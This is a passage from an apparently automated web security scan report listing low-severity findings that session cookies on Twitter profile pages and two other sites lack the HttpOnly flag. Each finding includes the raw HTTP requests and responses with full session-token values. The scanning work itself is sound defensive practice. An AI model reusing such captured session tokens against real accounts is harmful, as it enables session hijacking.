Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOo6w7gtAToHaWQiJTFmN2YyYzU0MmRhYmY4%250AZWYyNDc4ZWFmY2M4MmYwNjIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--724d5a6fe81e3fe03c41751c53520bd5bc139e61; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.77. http://twitter.com/kontentdesign

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /kontentdesign

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJTcyODA1NmExZmQ1MDE5ZTUzYjYyYjQ0NjQzMDVjYjkxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIhEB7vS0B--951e0307ecaa4357ec02a6a302e57cf685286962; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964125413234; path=/; expires=Tue, 01-Feb-11 14:02:05 GMT; domain=.twitter.com
  • guest_id=129596412736246980; path=/; expires=Thu, 24 Feb 2011 14:02:07 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kontentdesign HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964127-50745-17441
ETag: "63815a5d05a1b95386102d34a0650082"
Last-Modified: Tue, 25 Jan 2011 14:02:07 GMT
X-Runtime: 0.01446
Content-Type: text/html; charset=utf-8
Content-Length: 52448
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964125413234; path=/; expires=Tue, 01-Feb-11 14:02:05 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412736246980; path=/; expires=Thu, 24 Feb 2011 14:02:07 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTcyODA1NmExZmQ1MDE5ZTUzYjYyYjQ0NjQzMDVjYjkxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIhEB7vS0B--951e0307ecaa4357ec02a6a302e57cf685286962; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.78. http://twitter.com/nbc/primetime

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /nbc/primetime

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWNhY2QyMDk5NWYxMWM2MjRjNGQ0NDdhYTA1ZTQ3%250AYzA6DnJldHVybl90byIlaHR0cDovL3R3aXR0ZXIuY29tL25iYy9wcmltZXRp%250AbWU6B2lkIiU0NDZjYzZhOTY2NmJmZTZlZjQ3OGQ5ZGIyYmQxYzRiMCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCM25R7otAQ%253D%253D--d1e94695604015df0d84f87d3e421b29e16e392e; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910418725856; path=/; expires=Mon, 31-Jan-11 23:06:58 GMT; domain=.twitter.com
  • guest_id=129591041889118308; path=/; expires=Wed, 23 Feb 2011 23:06:58 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nbc/primetime HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910418-13129-32425
ETag: "a5a44db8a71fab6b9f2580b61e51bac4"
Last-Modified: Mon, 24 Jan 2011 23:06:58 GMT
X-Runtime: 0.49830
Content-Type: text/html; charset=utf-8
Content-Length: 57012
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910418725856; path=/; expires=Mon, 31-Jan-11 23:06:58 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591041889118308; path=/; expires=Wed, 23 Feb 2011 23:06:58 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWNhY2QyMDk5NWYxMWM2MjRjNGQ0NDdhYTA1ZTQ3%250AYzA6DnJldHVybl90byIlaHR0cDovL3R3aXR0ZXIuY29tL25iYy9wcmltZXRp%250AbWU6B2lkIiU0NDZjYzZhOTY2NmJmZTZlZjQ3OGQ5ZGIyYmQxYzRiMCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCM25R7otAQ%253D%253D--d1e94695604015df0d84f87d3e421b29e16e392e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.79. http://twitter.com/netlingo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlNGZlYmY1Yjc5NTA0ZjkwYmIwMWI5OGEyZDMyZTM1%250AYjk6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL25ldGxpbmdvOgdp%250AZCIlNDAzOGVkNGRhYjIyMmJkOGY3ZGY1YjQzNjEzOWM1MDciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgfMHu9LQE%253D--a495d11ca78d3b4eafce746e4006ed9d057939a8; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964121273602; path=/; expires=Tue, 01-Feb-11 14:02:01 GMT; domain=.twitter.com
  • guest_id=129596412316680845; path=/; expires=Thu, 24 Feb 2011 14:02:03 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964123-67769-3429
ETag: "8ed7c55c146db619fdf925948244e6a4"
Last-Modified: Tue, 25 Jan 2011 14:02:03 GMT
X-Runtime: 0.57870
Content-Type: text/html; charset=utf-8
Content-Length: 48756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964121273602; path=/; expires=Tue, 01-Feb-11 14:02:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412316680845; path=/; expires=Thu, 24 Feb 2011 14:02:03 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNGZlYmY1Yjc5NTA0ZjkwYmIwMWI5OGEyZDMyZTM1%250AYjk6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL25ldGxpbmdvOgdp%250AZCIlNDAzOGVkNGRhYjIyMmJkOGY3ZGY1YjQzNjEzOWM1MDciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgfMHu9LQE%253D--a495d11ca78d3b4eafce746e4006ed9d057939a8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.80. http://twitter.com/nickhalstead/status/15837113167

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /nickhalstead/status/15837113167

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlMTk2NDYwNmQ5MTBjYjNlYWEzY2UzYzZiOGE3MDQ5%250ANmI6DnJldHVybl90byI3aHR0cDovL3R3aXR0ZXIuY29tL25pY2toYWxzdGVh%250AZC9zdGF0dXMvMTU4MzcxMTMxNjc6B2lkIiViZDVjNTFmMjJhOThkNmZmODRl%250AMDVlOTAyNGUyNzJhNyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCIUFe70t%250AAQ%253D%253D--67c44ee9e15f6c0fbae20d582963e29eb03333df; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964110102891; path=/; expires=Tue, 01-Feb-11 14:01:50 GMT; domain=.twitter.com
  • guest_id=129596411225932495; path=/; expires=Thu, 24 Feb 2011 14:01:52 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nickhalstead/status/15837113167 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964112-46984-37079
ETag: "2a3e1a1864a58dc8b2d4201a204ff2c5"
Last-Modified: Tue, 25 Jan 2011 14:01:52 GMT
X-Runtime: 0.05636
Content-Type: text/html; charset=utf-8
Content-Length: 13650
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964110102891; path=/; expires=Tue, 01-Feb-11 14:01:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411225932495; path=/; expires=Thu, 24 Feb 2011 14:01:52 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMTk2NDYwNmQ5MTBjYjNlYWEzY2UzYzZiOGE3MDQ5%250ANmI6DnJldHVybl90byI3aHR0cDovL3R3aXR0ZXIuY29tL25pY2toYWxzdGVh%250AZC9zdGF0dXMvMTU4MzcxMTMxNjc6B2lkIiViZDVjNTFmMjJhOThkNmZmODRl%250AMDVlOTAyNGUyNzJhNyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCIUFe70t%250AAQ%253D%253D--67c44ee9e15f6c0fbae20d582963e29eb03333df; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.81. http://twitter.com/share

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /share

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJTVjN2EwN2Y1NmZjNDA0Y2VmY2ZjOTZjYWQxZjk1ZGRkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIGoZIui0B--d4a48b29139833c1231c8b092760bc08230aba84; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910470933847; path=/; expires=Mon, 31-Jan-11 23:07:50 GMT; domain=.twitter.com
  • guest_id=129591047119299301; path=/; expires=Wed, 23 Feb 2011 23:07:51 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Mon, 24 Jan 2011 23:07:51 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1295910471-34305-30633
Last-Modified: Mon, 24 Jan 2011 23:07:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910470933847; path=/; expires=Mon, 31-Jan-11 23:07:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591047119299301; path=/; expires=Wed, 23 Feb 2011 23:07:51 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjN2EwN2Y1NmZjNDA0Y2VmY2ZjOTZjYWQxZjk1ZGRkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIGoZIui0B--d4a48b29139833c1231c8b092760bc08230aba84; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...

14.82. http://twitter.com/spies_assassins

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /spies_assassins

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlOTFhMjVhMGYxN2MzNTI1ZTQ5ZmUzZjczMmNkZjE3%250AMjc6DnJldHVybl90byInaHR0cDovL3R3aXR0ZXIuY29tL3NwaWVzX2Fzc2Fz%250Ac2luczoHaWQiJTYzMTVlMzExN2JlZWI3ZTk3NzRhNmY4YzVlZGMxZGFhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIgVN6vS0B--19cfe0462f0d48cd362b4b7b652a3c4766f21675; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964064205570; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
  • guest_id=129596406668777691; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spies_assassins HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9198-19132
ETag: "d25862c279dba6cd1e553cac20d22d67"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.81721
Content-Type: text/html; charset=utf-8
Content-Length: 53400
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064205570; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406668777691; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlOTFhMjVhMGYxN2MzNTI1ZTQ5ZmUzZjczMmNkZjE3%250AMjc6DnJldHVybl90byInaHR0cDovL3R3aXR0ZXIuY29tL3NwaWVzX2Fzc2Fz%250Ac2luczoHaWQiJTYzMTVlMzExN2JlZWI3ZTk3NzRhNmY4YzVlZGMxZGFhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIgVN6vS0B--19cfe0462f0d48cd362b4b7b652a3c4766f21675; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.83. http://twitter.com/tweetmeme

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /tweetmeme

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJTJkNDc2OWNmNTUxYTAyZGE3OGM1MDcyNjFlYTA4NWNjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIfFR6vS0B--e1050b38818ecc596cfa97ed5bb62afd0749dcd8; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964064200831; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
  • guest_id=129596406693798147; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tweetmeme HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:06 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9478-51270
ETag: "7b585adb867e3eb6f32095f5c2866375"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.01836
Content-Type: text/html; charset=utf-8
Content-Length: 53983
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064200831; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406693798147; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTJkNDc2OWNmNTUxYTAyZGE3OGM1MDcyNjFlYTA4NWNjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIfFR6vS0B--e1050b38818ecc596cfa97ed5bb62afd0749dcd8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.84. http://twitter.com/typekit

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /typekit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJWZmZDVhODg4ZjIyMmRmMGIwMmY4ZGM3MmFlYTJhNDMxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIjlN7vS0B--f40f6aa2142d312dbf0ca41283ed8a96a762a0ed; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964130260966; path=/; expires=Tue, 01-Feb-11 14:02:10 GMT; domain=.twitter.com
  • guest_id=129596413223631444; path=/; expires=Thu, 24 Feb 2011 14:02:12 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964132-61803-46798
ETag: "2d1d82c342cf698a8f46318662e78b68"
Last-Modified: Tue, 25 Jan 2011 14:02:12 GMT
X-Runtime: 0.01489
Content-Type: text/html; charset=utf-8
Content-Length: 43545
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964130260966; path=/; expires=Tue, 01-Feb-11 14:02:10 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596413223631444; path=/; expires=Thu, 24 Feb 2011 14:02:12 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZmZDVhODg4ZjIyMmRmMGIwMmY4ZGM3MmFlYTJhNDMxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIjlN7vS0B--f40f6aa2142d312dbf0ca41283ed8a96a762a0ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.85. http://twitter.com/ups

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ups

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJTYxMDFiNjg3MGUwYWZiNDYxNDkyZGM1NTZiMTIxZGJjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISp16vS0B--e1e310d0e3c9c2bde665bf97fbd81a7490ab10e3; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964083613063; path=/; expires=Tue, 01-Feb-11 14:01:23 GMT; domain=.twitter.com
  • guest_id=129596408557745250; path=/; expires=Thu, 24 Feb 2011 14:01:25 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964085-20547-5536
ETag: "85433ba8bcb16420f3ea185c5d7c6195"
Last-Modified: Tue, 25 Jan 2011 14:01:25 GMT
X-Runtime: 0.01379
Content-Type: text/html; charset=utf-8
Content-Length: 52371
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964083613063; path=/; expires=Tue, 01-Feb-11 14:01:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596408557745250; path=/; expires=Thu, 24 Feb 2011 14:01:25 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTYxMDFiNjg3MGUwYWZiNDYxNDkyZGM1NTZiMTIxZGJjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISp16vS0B--e1e310d0e3c9c2bde665bf97fbd81a7490ab10e3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.86. http://whdhstore.hipcricket.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://whdhstore.hipcricket.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Content-Length: 19423
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
Cache-control: private


<style type="text/css">
/* classic styles pulled in from old template - using arial instead of TNR */
td {font-family:Arial; font-size:12px;color:#000000;}
p {font-family:Arial; font-size:12px;}
...[SNIP]...

14.87. http://www.123movers.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.123movers.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQASCCBDS=EPAJINICMHLKFHLFPHBOJOAC; path=/
  • clicks=duplicate; expires=Tue, 25-Jan-2011 23:11:22 GMT; path=/
  • userData=se=&keyword=&httpReferer=; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.123movers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:11:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 41036
